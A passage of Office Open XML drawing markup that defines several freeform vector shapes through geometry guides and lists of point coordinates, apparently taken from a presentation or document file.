                  <a:gd name="T76" fmla="*/ 150 w 151"/>
                  <a:gd name="T77" fmla="*/ 75 h 150"/>
                  <a:gd name="T78" fmla="*/ 149 w 151"/>
                  <a:gd name="T79" fmla="*/ 56 h 150"/>
                  <a:gd name="T80" fmla="*/ 149 w 151"/>
                  <a:gd name="T81" fmla="*/ 39 h 150"/>
                  <a:gd name="T82" fmla="*/ 148 w 151"/>
                  <a:gd name="T83" fmla="*/ 27 h 150"/>
                  <a:gd name="T84" fmla="*/ 145 w 151"/>
                  <a:gd name="T85" fmla="*/ 23 h 150"/>
                  <a:gd name="T86" fmla="*/ 139 w 151"/>
                  <a:gd name="T87" fmla="*/ 18 h 150"/>
                  <a:gd name="T88" fmla="*/ 130 w 151"/>
                  <a:gd name="T89" fmla="*/ 12 h 150"/>
                  <a:gd name="T90" fmla="*/ 122 w 151"/>
                  <a:gd name="T91" fmla="*/ 7 h 1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1"/>
                  <a:gd name="T139" fmla="*/ 0 h 150"/>
                  <a:gd name="T140" fmla="*/ 151 w 151"/>
                  <a:gd name="T141" fmla="*/ 150 h 1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1" h="150">
                    <a:moveTo>
                      <a:pt x="122" y="7"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="117" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="120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0" y="75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48" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="7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5" name="Freeform 150">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECAB5FA8-8056-4C1B-B476-963F279C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" y="2234"/>
                <a:ext cx="93" cy="136"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 12 w 93"/>
                  <a:gd name="T1" fmla="*/ 111 h 136"/>
                  <a:gd name="T2" fmla="*/ 33 w 93"/>
                  <a:gd name="T3" fmla="*/ 110 h 136"/>
                  <a:gd name="T4" fmla="*/ 52 w 93"/>
                  <a:gd name="T5" fmla="*/ 104 h 136"/>
                  <a:gd name="T6" fmla="*/ 58 w 93"/>
                  <a:gd name="T7" fmla="*/ 92 h 136"/>
                  <a:gd name="T8" fmla="*/ 57 w 93"/>
                  <a:gd name="T9" fmla="*/ 84 h 136"/>
                  <a:gd name="T10" fmla="*/ 71 w 93"/>
                  <a:gd name="T11" fmla="*/ 68 h 136"/>
                  <a:gd name="T12" fmla="*/ 57 w 93"/>
                  <a:gd name="T13" fmla="*/ 75 h 136"/>
                  <a:gd name="T14" fmla="*/ 65 w 93"/>
                  <a:gd name="T15" fmla="*/ 59 h 136"/>
                  <a:gd name="T16" fmla="*/ 77 w 93"/>
                  <a:gd name="T17" fmla="*/ 39 h 136"/>
                  <a:gd name="T18" fmla="*/ 58 w 93"/>
                  <a:gd name="T19" fmla="*/ 57 h 136"/>
                  <a:gd name="T20" fmla="*/ 57 w 93"/>
                  <a:gd name="T21" fmla="*/ 30 h 136"/>
                  <a:gd name="T22" fmla="*/ 48 w 93"/>
                  <a:gd name="T23" fmla="*/ 21 h 136"/>
                  <a:gd name="T24" fmla="*/ 36 w 93"/>
                  <a:gd name="T25" fmla="*/ 17 h 136"/>
                  <a:gd name="T26" fmla="*/ 59 w 93"/>
                  <a:gd name="T27" fmla="*/ 10 h 136"/>
                  <a:gd name="T28" fmla="*/ 70 w 93"/>
                  <a:gd name="T29" fmla="*/ 17 h 136"/>
                  <a:gd name="T30" fmla="*/ 63 w 93"/>
                  <a:gd name="T31" fmla="*/ 10 h 136"/>
                  <a:gd name="T32" fmla="*/ 50 w 93"/>
                  <a:gd name="T33" fmla="*/ 6 h 136"/>
                  <a:gd name="T34" fmla="*/ 59 w 93"/>
                  <a:gd name="T35" fmla="*/ 3 h 136"/>
                  <a:gd name="T36" fmla="*/ 67 w 93"/>
                  <a:gd name="T37" fmla="*/ 0 h 136"/>
                  <a:gd name="T38" fmla="*/ 78 w 93"/>
                  <a:gd name="T39" fmla="*/ 7 h 136"/>
                  <a:gd name="T40" fmla="*/ 88 w 93"/>
                  <a:gd name="T41" fmla="*/ 15 h 136"/>
                  <a:gd name="T42" fmla="*/ 92 w 93"/>
                  <a:gd name="T43" fmla="*/ 26 h 136"/>
                  <a:gd name="T44" fmla="*/ 91 w 93"/>
                  <a:gd name="T45" fmla="*/ 50 h 136"/>
                  <a:gd name="T46" fmla="*/ 88 w 93"/>
                  <a:gd name="T47" fmla="*/ 78 h 136"/>
                  <a:gd name="T48" fmla="*/ 82 w 93"/>
                  <a:gd name="T49" fmla="*/ 106 h 136"/>
                  <a:gd name="T50" fmla="*/ 80 w 93"/>
                  <a:gd name="T51" fmla="*/ 123 h 136"/>
                  <a:gd name="T52" fmla="*/ 75 w 93"/>
                  <a:gd name="T53" fmla="*/ 131 h 136"/>
                  <a:gd name="T54" fmla="*/ 63 w 93"/>
                  <a:gd name="T55" fmla="*/ 135 h 136"/>
                  <a:gd name="T56" fmla="*/ 55 w 93"/>
                  <a:gd name="T57" fmla="*/ 132 h 136"/>
                  <a:gd name="T58" fmla="*/ 48 w 93"/>
                  <a:gd name="T59" fmla="*/ 126 h 136"/>
                  <a:gd name="T60" fmla="*/ 46 w 93"/>
                  <a:gd name="T61" fmla="*/ 123 h 136"/>
                  <a:gd name="T62" fmla="*/ 36 w 93"/>
                  <a:gd name="T63" fmla="*/ 131 h 136"/>
                  <a:gd name="T64" fmla="*/ 25 w 93"/>
                  <a:gd name="T65" fmla="*/ 133 h 136"/>
                  <a:gd name="T66" fmla="*/ 15 w 93"/>
                  <a:gd name="T67" fmla="*/ 132 h 136"/>
                  <a:gd name="T68" fmla="*/ 21 w 93"/>
                  <a:gd name="T69" fmla="*/ 126 h 136"/>
                  <a:gd name="T70" fmla="*/ 32 w 93"/>
                  <a:gd name="T71" fmla="*/ 117 h 136"/>
                  <a:gd name="T72" fmla="*/ 15 w 93"/>
                  <a:gd name="T73" fmla="*/ 124 h 136"/>
                  <a:gd name="T74" fmla="*/ 3 w 93"/>
                  <a:gd name="T75" fmla="*/ 128 h 136"/>
                  <a:gd name="T76" fmla="*/ 0 w 93"/>
                  <a:gd name="T77" fmla="*/ 123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3"/>
                  <a:gd name="T118" fmla="*/ 0 h 136"/>
                  <a:gd name="T119" fmla="*/ 93 w 93"/>
                  <a:gd name="T120" fmla="*/ 136 h 1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3" h="136">
                    <a:moveTo>
                      <a:pt x="0" y="112"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="12" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="112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6" name="Freeform 151">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1D20F2B-5E40-4225-BE87-E15049E17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8" y="2304"/>
                <a:ext cx="27" cy="61"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 27"/>
                  <a:gd name="T1" fmla="*/ 60 h 61"/>
                  <a:gd name="T2" fmla="*/ 5 w 27"/>
                  <a:gd name="T3" fmla="*/ 57 h 61"/>
                  <a:gd name="T4" fmla="*/ 9 w 27"/>
                  <a:gd name="T5" fmla="*/ 53 h 61"/>
                  <a:gd name="T6" fmla="*/ 13 w 27"/>
                  <a:gd name="T7" fmla="*/ 45 h 61"/>
                  <a:gd name="T8" fmla="*/ 15 w 27"/>
                  <a:gd name="T9" fmla="*/ 37 h 61"/>
                  <a:gd name="T10" fmla="*/ 20 w 27"/>
                  <a:gd name="T11" fmla="*/ 28 h 61"/>
                  <a:gd name="T12" fmla="*/ 20 w 27"/>
                  <a:gd name="T13" fmla="*/ 20 h 61"/>
                  <a:gd name="T14" fmla="*/ 23 w 27"/>
                  <a:gd name="T15" fmla="*/ 8 h 61"/>
                  <a:gd name="T16" fmla="*/ 26 w 27"/>
                  <a:gd name="T17" fmla="*/ 0 h 61"/>
                  <a:gd name="T18" fmla="*/ 20 w 27"/>
                  <a:gd name="T19" fmla="*/ 17 h 61"/>
                  <a:gd name="T20" fmla="*/ 15 w 27"/>
                  <a:gd name="T21" fmla="*/ 31 h 61"/>
                  <a:gd name="T22" fmla="*/ 10 w 27"/>
                  <a:gd name="T23" fmla="*/ 40 h 61"/>
                  <a:gd name="T24" fmla="*/ 3 w 27"/>
                  <a:gd name="T25" fmla="*/ 50 h 61"/>
                  <a:gd name="T26" fmla="*/ 0 w 27"/>
                  <a:gd name="T27" fmla="*/ 60 h 6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7"/>
                  <a:gd name="T43" fmla="*/ 0 h 61"/>
                  <a:gd name="T44" fmla="*/ 27 w 27"/>
                  <a:gd name="T45" fmla="*/ 61 h 6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7" h="61">
                    <a:moveTo>
                      <a:pt x="0" y="60"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="50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7" name="Freeform 152">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71D65ADB-BEBD-4FC6-B88A-0F271FDCC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7" y="2251"/>
                <a:ext cx="108" cy="96"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 74 w 108"/>
                  <a:gd name="T1" fmla="*/ 3 h 96"/>
                  <a:gd name="T2" fmla="*/ 65 w 108"/>
                  <a:gd name="T3" fmla="*/ 18 h 96"/>
                  <a:gd name="T4" fmla="*/ 67 w 108"/>
                  <a:gd name="T5" fmla="*/ 31 h 96"/>
                  <a:gd name="T6" fmla="*/ 66 w 108"/>
                  <a:gd name="T7" fmla="*/ 47 h 96"/>
                  <a:gd name="T8" fmla="*/ 66 w 108"/>
                  <a:gd name="T9" fmla="*/ 50 h 96"/>
                  <a:gd name="T10" fmla="*/ 67 w 108"/>
                  <a:gd name="T11" fmla="*/ 55 h 96"/>
                  <a:gd name="T12" fmla="*/ 63 w 108"/>
                  <a:gd name="T13" fmla="*/ 59 h 96"/>
                  <a:gd name="T14" fmla="*/ 58 w 108"/>
                  <a:gd name="T15" fmla="*/ 63 h 96"/>
                  <a:gd name="T16" fmla="*/ 52 w 108"/>
                  <a:gd name="T17" fmla="*/ 63 h 96"/>
                  <a:gd name="T18" fmla="*/ 27 w 108"/>
                  <a:gd name="T19" fmla="*/ 65 h 96"/>
                  <a:gd name="T20" fmla="*/ 15 w 108"/>
                  <a:gd name="T21" fmla="*/ 67 h 96"/>
                  <a:gd name="T22" fmla="*/ 0 w 108"/>
                  <a:gd name="T23" fmla="*/ 71 h 96"/>
                  <a:gd name="T24" fmla="*/ 0 w 108"/>
                  <a:gd name="T25" fmla="*/ 81 h 96"/>
                  <a:gd name="T26" fmla="*/ 9 w 108"/>
                  <a:gd name="T27" fmla="*/ 79 h 96"/>
                  <a:gd name="T28" fmla="*/ 12 w 108"/>
                  <a:gd name="T29" fmla="*/ 74 h 96"/>
                  <a:gd name="T30" fmla="*/ 14 w 108"/>
                  <a:gd name="T31" fmla="*/ 84 h 96"/>
                  <a:gd name="T32" fmla="*/ 19 w 108"/>
                  <a:gd name="T33" fmla="*/ 91 h 96"/>
                  <a:gd name="T34" fmla="*/ 36 w 108"/>
                  <a:gd name="T35" fmla="*/ 95 h 96"/>
                  <a:gd name="T36" fmla="*/ 34 w 108"/>
                  <a:gd name="T37" fmla="*/ 90 h 96"/>
                  <a:gd name="T38" fmla="*/ 25 w 108"/>
                  <a:gd name="T39" fmla="*/ 79 h 96"/>
                  <a:gd name="T40" fmla="*/ 33 w 108"/>
                  <a:gd name="T41" fmla="*/ 76 h 96"/>
                  <a:gd name="T42" fmla="*/ 36 w 108"/>
                  <a:gd name="T43" fmla="*/ 84 h 96"/>
                  <a:gd name="T44" fmla="*/ 48 w 108"/>
                  <a:gd name="T45" fmla="*/ 94 h 96"/>
                  <a:gd name="T46" fmla="*/ 64 w 108"/>
                  <a:gd name="T47" fmla="*/ 94 h 96"/>
                  <a:gd name="T48" fmla="*/ 47 w 108"/>
                  <a:gd name="T49" fmla="*/ 83 h 96"/>
                  <a:gd name="T50" fmla="*/ 39 w 108"/>
                  <a:gd name="T51" fmla="*/ 76 h 96"/>
                  <a:gd name="T52" fmla="*/ 44 w 108"/>
                  <a:gd name="T53" fmla="*/ 72 h 96"/>
                  <a:gd name="T54" fmla="*/ 50 w 108"/>
                  <a:gd name="T55" fmla="*/ 79 h 96"/>
                  <a:gd name="T56" fmla="*/ 61 w 108"/>
                  <a:gd name="T57" fmla="*/ 87 h 96"/>
                  <a:gd name="T58" fmla="*/ 71 w 108"/>
                  <a:gd name="T59" fmla="*/ 92 h 96"/>
                  <a:gd name="T60" fmla="*/ 83 w 108"/>
                  <a:gd name="T61" fmla="*/ 92 h 96"/>
                  <a:gd name="T62" fmla="*/ 76 w 108"/>
                  <a:gd name="T63" fmla="*/ 87 h 96"/>
                  <a:gd name="T64" fmla="*/ 66 w 108"/>
                  <a:gd name="T65" fmla="*/ 79 h 96"/>
                  <a:gd name="T66" fmla="*/ 68 w 108"/>
                  <a:gd name="T67" fmla="*/ 76 h 96"/>
                  <a:gd name="T68" fmla="*/ 73 w 108"/>
                  <a:gd name="T69" fmla="*/ 82 h 96"/>
                  <a:gd name="T70" fmla="*/ 83 w 108"/>
                  <a:gd name="T71" fmla="*/ 89 h 96"/>
                  <a:gd name="T72" fmla="*/ 95 w 108"/>
                  <a:gd name="T73" fmla="*/ 90 h 96"/>
                  <a:gd name="T74" fmla="*/ 102 w 108"/>
                  <a:gd name="T75" fmla="*/ 81 h 96"/>
                  <a:gd name="T76" fmla="*/ 80 w 108"/>
                  <a:gd name="T77" fmla="*/ 78 h 96"/>
                  <a:gd name="T78" fmla="*/ 66 w 108"/>
                  <a:gd name="T79" fmla="*/ 71 h 96"/>
                  <a:gd name="T80" fmla="*/ 64 w 108"/>
                  <a:gd name="T81" fmla="*/ 65 h 96"/>
                  <a:gd name="T82" fmla="*/ 69 w 108"/>
                  <a:gd name="T83" fmla="*/ 67 h 96"/>
                  <a:gd name="T84" fmla="*/ 83 w 108"/>
                  <a:gd name="T85" fmla="*/ 76 h 96"/>
                  <a:gd name="T86" fmla="*/ 102 w 108"/>
                  <a:gd name="T87" fmla="*/ 81 h 96"/>
                  <a:gd name="T88" fmla="*/ 105 w 108"/>
                  <a:gd name="T89" fmla="*/ 63 h 96"/>
                  <a:gd name="T90" fmla="*/ 95 w 108"/>
                  <a:gd name="T91" fmla="*/ 60 h 96"/>
                  <a:gd name="T92" fmla="*/ 74 w 108"/>
                  <a:gd name="T93" fmla="*/ 62 h 96"/>
                  <a:gd name="T94" fmla="*/ 71 w 108"/>
                  <a:gd name="T95" fmla="*/ 58 h 96"/>
                  <a:gd name="T96" fmla="*/ 82 w 108"/>
                  <a:gd name="T97" fmla="*/ 60 h 96"/>
                  <a:gd name="T98" fmla="*/ 105 w 108"/>
                  <a:gd name="T99" fmla="*/ 55 h 96"/>
                  <a:gd name="T100" fmla="*/ 106 w 108"/>
                  <a:gd name="T101" fmla="*/ 39 h 96"/>
                  <a:gd name="T102" fmla="*/ 106 w 108"/>
                  <a:gd name="T103" fmla="*/ 20 h 96"/>
                  <a:gd name="T104" fmla="*/ 93 w 108"/>
                  <a:gd name="T105" fmla="*/ 12 h 96"/>
                  <a:gd name="T106" fmla="*/ 106 w 108"/>
                  <a:gd name="T107" fmla="*/ 16 h 96"/>
                  <a:gd name="T108" fmla="*/ 99 w 108"/>
                  <a:gd name="T109" fmla="*/ 5 h 96"/>
                  <a:gd name="T110" fmla="*/ 87 w 108"/>
                  <a:gd name="T111" fmla="*/ 0 h 9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8"/>
                  <a:gd name="T169" fmla="*/ 0 h 96"/>
                  <a:gd name="T170" fmla="*/ 108 w 108"/>
                  <a:gd name="T171" fmla="*/ 96 h 9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8" h="96">
                    <a:moveTo>
                      <a:pt x="87" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="74" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="47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4" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="67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9" y="84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3" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="92"/>
                    </a:lnTo>
